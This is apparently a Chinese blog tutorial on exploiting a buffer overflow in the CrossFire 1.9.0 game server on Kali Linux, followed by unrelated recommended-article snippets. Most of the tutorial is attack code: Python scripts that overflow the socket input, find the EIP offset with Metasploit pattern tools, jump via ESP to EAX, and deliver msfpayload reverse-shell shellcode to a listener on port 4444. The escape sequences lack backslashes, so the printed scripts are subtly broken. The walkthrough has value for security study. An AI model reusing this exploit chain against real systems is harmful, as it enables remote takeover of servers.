linux畸形文件夹,Linux下简单的缓冲区溢出

最新推荐文章于 2022-10-11 14:09:52 发布
最新推荐文章于 2022-10-11 14:09:52 发布
阅读量156 收藏
点赞数
文章标签: linux畸形文件夹

66b52468c121889b900d4956032f1009.png

8种机械键盘轴体对比

本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?

科班出身,或者搞过汇编C等的应该知道,当缓冲区边界限制不严格时,由于变量传入畸形数据或进程运行错误,导致缓冲区被“撑爆”,从而覆盖了相邻内存区域的数据

可修改内存数据,造成进程劫持,执行恶意代码,获取服务器控制权等后果

实例

准备

CrossFire多人在线RPG游戏

1.9.0 版本接受入站 socket 连接时存在缓冲区溢出漏洞 (服务端)

调试工具edb

运行环境kali 2.0 x64虚拟机

Linux内存保护机制DEP

ASLR

堆栈 cookies

堆栈粉碎

实战

避免测试中我们的虚拟机被劫持,通过iptables设置目标端口只允许本地访问1

2

3

4

5iptables -A INPUT -p tcp --destination-port 4444 ! -d 127.0.0.1 -j DROP

iptables -A INPUT -p tcp --destination-port 13327 ! -d 127.0.0.1 -j DROP

创建/usr/games/目录,将crossfire1.9.0服务端解压到目录1

2

3

4#解压

touch /usr/games/

cd /usr/games/

tar zxpf crossfire.tar.gz

运行一下crossfire看看有没有问题 ./crossfire

出现Waiting for connections即可,有问题看看Error1

2#开启调试

edb --run /usr/games/crossfire/bin/crossfire

右下角是paused暂停状态

菜单栏 Debug => Run(F9) 点击两回可以运行起来

可以通过命令查看进程端口信息1

2#查看开放端口

netstat -pantu | grep 13327

EIP中存放的是下一条命令的地址

这个进程和一般的溢出不同,它必须发送固定的数据量才可以发生溢出,而不是大于某个数据量都可以,我们构造如下python进程测试1

2

3

4

5

6

7

8

9

10

11

12

13#! /usr/bin/python

import socket

host = "127.0.0.1"

crash = "x41" * 4379 ## x41为十六进制的大写A

buffer = "x11(setup sound " + crash + "x90x00#" ## x90是NULL,x00是空字符

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

print "[*]Sending evil buffer..."

s.connect((host,13327))

data = s.recv(1024)

print data

s.send(buffer)

s.close()

print "[*]Payload Sent!"

运行后,edb报错如下

意思是EIP(存放一下条执行命令的地址)已经被覆盖成上图黑体中的地址,而计算机找不到这个地址。这个地址正是由我们输入的A,说明EIP可控,存在溢出。

这里你也可以测试增加一个A或者减少一个A发送,会发现后边两个数值都不是A,都不可控,也就是说数据量只有为4379时EIP才完全可控

为了查看到底是哪个位置的A才是溢出后的EIP地址,借助工具生成唯一字符串1

2cd /usr/share/metasploit-framework/tools/exploit/

./pattern_create.rb -l 4379

复制下来,构造如下python脚本1

2

3

4

5

6

7

8

9

10

11

12

13#! /usr/bin/python

import socket

host = "127.0.0.1"

crash = "唯一字符串"

buffer = "x11(setup sound " + crash + "x90x00#"

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

print "[*]Sending evil buffer..."

s.connect((host,13327))

data = s.recv(1024)

print data

s.send(buffer)

s.close()

print "[*]Payload Sent!"

开启edb启动进程,运行python进程

利用工具确认字符串的位置1

2cd /usr/share/metasploit-framework/tools/exploit/

./pattern_offset.rb -q 46367046

就是说EIP地址前面有4368个字符。 4369,4370,4371,4372的位置存放的是溢出后的EIP地址

构造如下python脚本验证1

2

3

4

5

6

7

8

9

10

11

12

13#! /usr/bin/python

import socket

host = "127.0.0.1"

crash = 'A'*4368 + 'B'*4 + 'C'*7 ## 凑够4379个字符

buffer = "x11(setup sound " + crash + "x90x00#"

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

print "[*]Sending evil buffer..."

s.connect((host,13327))

data = s.recv(1024)

print data

s.send(buffer)

s.close()

print "[*]Payload Sent!"

可以看到EIP地址被精准的填充为B字符

右键ESP,选择 Follow In Dump 查看数据

因为必须是精确的字符才能溢出,就是说ESP寄存器只能存放7个字符,显然无法存放shellcode

几个寄存器都查看后,选择了EAX。因为EAX存放的是我们之前发送的几千个A,是可控的,且有足够的大小存放shellcode

思路就是让EIP存放EAX的地址,然后在地址上加12,直接从第一个A的位置开始执行。但是各个机器的EAX的地址也各不相同,不具有通用性,所以直接跳转的思路就放弃。

既然ESP可以存放7个字符,想到了跳转EAX并偏移12

构造如下python代码运行1

2

3

4

5

6

7

8

9

10

11

12

13#! /usr/bin/python

import socket

host = "127.0.0.1"

crash = 'A'*4368 + 'B'*4 + 'x83xc0x0cxffxe0x90x90'

buffer = "x11(setup sound " + crash + "x90x00#"

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

print "[*]Sending evil buffer..."

s.connect((host,13327))

data = s.recv(1024)

print data

s.send(buffer)

s.close()

print "[*]Payload Sent!"

首先EIP地址仍然是精准的四个B

ESP => Follow In Dump 查看

83 c0 0c ff e0 90 90 说明这里也完美写入

思路就是EIP => ESP => EAX,EAX存放shellcode,因为ESP地址不固定,需要借助固定的地址跳转

打开edb,菜单栏 Plugins => OpcodeSearcher => OpcodeSearch

选择crossfire进程,ESP -> EIP,选择一个jmp esp 的地址,这个地址是不会变的

菜单栏 plugin => breakpointmanager => breakpoints 选择add增加我们上边选择的地址的断点用来测试。

然后我们测试坏字符,经过测试坏字符是x00x0ax0dx20

生成shellcode并过滤坏字符1

2

3cd /usr/share/framework2/

./msfpayload -l #可以生成的shellcode的种类

./msfpayload linux_ia32_reverse LHOST=127.0.0.1 LPORT=4444 R | ./msfencode -b "x00x0ax0dx20"

构建python脚本1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23#!/usr/bin/python

import socket

host = "127.0.0.1"

shellcode = (

"xbbx6dx65x9bxcdxdbxddxd9x74x24xf4x5fx2bxc9"+

"xb1x14x83xc7x04x31x5fx10x03x5fx10x8fx90xaa"+

"x16xb8xb8x9exebx15x55x23x65x78x19x45xb8xfa"+

"x01xd4x10x92xb7xe8x85x3exd2xf8xf4xeexabx18"+

"x9cx68xf4x17xe1xfdx45xacx51xf9xf5xcax58x81"+

"xb5xa2x05x4cxb9x50x90x24x85x0exeex38xb0xd7"+

"x08x50x6cx07x9axc8x1ax78x3ex61xb5x0fx5dx21"+

"x1ax99x43x71x97x54x03")

crash = shellcode + "A"*(4368-105) + "x97x45x13x08" + "x83xc0x0cxffxe0x90x90"

buffer = "x11(setup sound " +crash+ "x90x90#)"

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

print "[*]Sending evil buffer..."

s.connect((host,13327))

data = s.recv(1024)

print data

s.send(buffer)

s.close()

print "[*]Payload Sent!"

监听本地的4444端口,即可获取一个shell

弘植植
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux下rabbitmq查询status报错
weixin_33939843的博客
08-24 808
使用rabbitmqctl 查询status报错根据报错提示,查看端口,netstat -anplt,发现4369和25672端口都在开放进程中rabbitmq也有rabbitmq进程 ps aux | grep rabbitmq网上有人说杀掉rabbitmq进程重启,发现并不行,因为rabbitmq日志是正常的,error日志为空废话不多说,直接上答案,最后再次查看status报错信息,可能是因...
rabbitmq 学习 之 Networking and RabbitMQ(38)
xiaoliuliu2050的专栏
06-29 837
https://www.rabbitmq.com/networking.html 网络和RabbitMQ 介绍 客户端通过网络与RabbitMQ进行通信。broker支持的所有协议都是基于TCP的。RabbitMQ和操作系统都提供了许多可以调整的旋钮。其中一些与TCP和IP操作直接相关,另一些与应用程序级协议(如TLS)有关。本指南涵盖了与RabbitMQ环境中的网络相关的多个主题。...
Linux&Docker&Mysql&GitWin常用命令
在路上
07-12 451
苦于有时候某个命令真的想不起,又得百度,干脆以后操作linux时,打开博文直接查询多爽。 基于安装rabbitmq时,某个命令不会,写下的,后面再继续补充 1.基本命令: 删除文件:rm -rf + 名称 查看当前路径: pwd 复制文件:cp [ -r ] 源文件或目录 目标文件或目录 复制多个文件:cp /home/usr/dir/{file1,file2,file3,file4} /home/usr/destination/ 显示解压文件的过程 tar -zxvf 文件名称 不显
rabbitmq windows 连接 linux,RabbitMQ安装笔记
weixin_42512128的博客
05-08 112
RabbitMQ安装笔记安装Erlang在安装RabbitMQ之前,需要先安装Erlang。可以通过以下命令安装:yum install erlang安装时信息如下:安装RabbitMQ 服务端安装命令如下:wget http://www.rabbitmq.com/releases/rabbitmq-server/v3.4.2/rabbitmq-server-3.4.2-1.noarch.rpmr...
linux安装rabbitmq
m0_73570288的博客
10-11 569
第三步:设置 admin 用户的权限,指定允许访问的vhost以及write/read。#第二步:添加 admin 用户为administrator角色。是用erlang语言写的,所以安装的话要下载erlang环境,一定要注意rabbitmq对应erlang的版本号!#第六步:重启RabbitMQ,然后用设置账户和密码登录。#第四步:查看vhost(/)允许哪些用户访问。erlang语言运行依赖一个插件,安装一下。#第一步:添加 admin 用户并设置密码。#第五步:查看用户列表。解压rabbitmq。
Linux下文件格式模糊测试的实现.pdf
09-06
接下来,需要确定需要监视的系统信号,这些信号可以是内存操作错误、缓冲区溢出错误、权限验证错误等。 在确定需要监视的系统信号后,需要利用调试器监视子进程的运行,并捕捉触发漏洞的系统信号。当检测到触发漏洞...
BAT批处理脚本-畸形文件夹.zip
12-22
在“畸形文件夹”场景下,批处理脚本可能被用来解决特定问题,例如删除无法正常访问或者命名不规范的文件夹畸形文件夹可能由于各种原因产生,如文件系统错误、不正确的程序操作或者恶意软件。这些文件夹通常不能...
linux安全工具:isic和rain
最新发布
07-25
linux安全工具:畸形包非法数据包发包工具isic和分片重组测试工具rain, 可以模拟发送特定流量用于测试网络设备安全性和健壮性
畸形文件删除工具,可删除畸形文件夹
02-06
1. **新建**:在正常情况下,创建新文件或文件夹是一个简单的任务。然而,如果存在系统错误,某些位置可能无法创建新的文件或文件夹。该工具可能包含了特殊机制,能够绕过这些异常,帮助用户在有问题的区域创建新的...
Linux系统.pdf
09-07
由于在处理MDTM命令参数时缺乏正确的缓冲区边界检查,存在缓冲区溢出漏洞。远程攻击者可以通过构造畸形的超长时区数据作为命令参数,触发FTP服务程序的溢出,从而以FTP进程权限执行任意指令。这个漏洞不需要攻击者...
CrossFire!!!
08-09
来这下载的童鞋都是朋友,我就不多介绍了,下载下来看看就知道了o(∩_∩)o
linux 单机部署rabbitmq
水布天
07-13 690
linux 单机部署rabbitmq
Java在Shell脚本中调用tar解压卡死问题
wsc的博客
08-31 1846
1. 现象描述:tar包内有1500个问题,通过shell脚本进行解压 比如:脚本文件有 test.tgz #!/bin/bash ..... tar xvzf test.tgz ..... 问题:通过Java的Process调用出现卡死在waitFor()方法上(特殊原因,不能设置脚本超时时间),但是手动执行脚本能够正常解压 问题原因: (压缩包的文件事件超前)在控制台手动执行,写入错误缓冲区的错误缓冲流能够及时输出在控制台上,不会导致错误缓冲区满了。 在脚本上输出并没有消费错误缓冲区,导致缓
kali+php+缓冲区溢出,kali linux之edb--CrossFire缓冲区溢出
weixin_30880565的博客
04-13 406
漏洞的罪恶根源------变量,数据与代码边界不清,开发人员对用户输入没做过滤,或者过滤不严如这个脚本,写什么,显示什么,但是加上;,|,&&,后面加上系统命令,就执行命令了缓冲区溢出:当边界限制不严格时,由于变量传入畸形数据或程序运行错误,导致缓冲区被撑爆,从而覆盖了相邻内存区域的数据,成功修改i内存数据,可造成进程劫持,执行恶意代码,获取服务器控制权等后果如何发现漏洞?源码审计...
缓冲区溢出实例(二)–Linux
weixin_41082546的博客
03-12 683
原理:crossfire 1.9.0 版本接受入站 socket 连接时存在缓冲区溢出漏洞。 工具: 调试工具:edb; ###python在漏洞溢出方面的渗透测试和漏洞攻击中,具有很大的优势 实验对象:crossfire【多人在线RPG游戏】 运行平台:Kali i386 虚拟机【32位,计算机CPU位数是指地址总线位数,64位系统的寻址空间为2^64,寻址过大,难以处理,为了简化操作,...
小白日记18:kali渗透测试之缓冲区溢出实例(二)--Linux,穿越火线1.9.0
ZiXuanFY的博客
09-20 7358
Linux系统下穿越火线-缓冲区溢出 原理:1.9.0 版本接受入站 socket 连接时存在缓冲区溢出漏洞。 工具:调试工具:edb; 实验对象:crossfire 运行平台:Kali i686 虚拟机【32位,计算机CPU位数是指地址总线,64位系统的寻址空间过大,难以处理,为了简化本章操作,所以选用32位】
【安全牛学习笔记】Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令
weixin_34159110的博客
09-06 1624
持久加密USB安装-1LUKS: linux UNified Key Setup 磁盘分区加密规范 不依赖于操作系统的磁盘级加密 Windows——DoxBox 后端:dm-crypt 前端:cryptsetup 微软的bitlocker将镜像刻录到U盘 dd if=kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=1Mroot...
Kali linux 学习笔记(十九)缓冲区溢出——linux(crossfire) 2020.3.1
闵行小鱼塘
03-01 1391
上一篇在windows下用SLMail的漏洞实现缓冲区溢出,这次在Linux下用crossfire的漏洞实现缓冲区溢出
linux缓冲区输出到文件,Linux缓冲输出问题
weixin_36073697的博客
04-29 480
在网上看到一段这样的代码,这段代码本身是有问题的,我看了一下,觉得没什么问题,结果编译运行一下确实报错,查了一下linux下缓冲方面的资料,跟大家分享一下,最后说下这段代码的问题所在当一个程序运行输出时,是否有必要将输出立即展示给用户?这个问题根据用户需要而定举个例子:假设一个程序输出到终端,向终端用户提问,要求用户回答;或者向用户给出提示,即让用户指定应该键入什么内容,这时候,程序的输出应该立即...
Kali Linux渗透测试:缓冲区溢出攻防实战
"Kali Linux渗透测试中的缓冲区溢出技术是网络安全领域的重要知识点,主要涉及利用程序漏洞来控制程序执行流程。此章节详细讲解了缓冲区溢出的原理、检测方法以及在Windows环境下的实战应用。" 缓冲区溢出是由于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值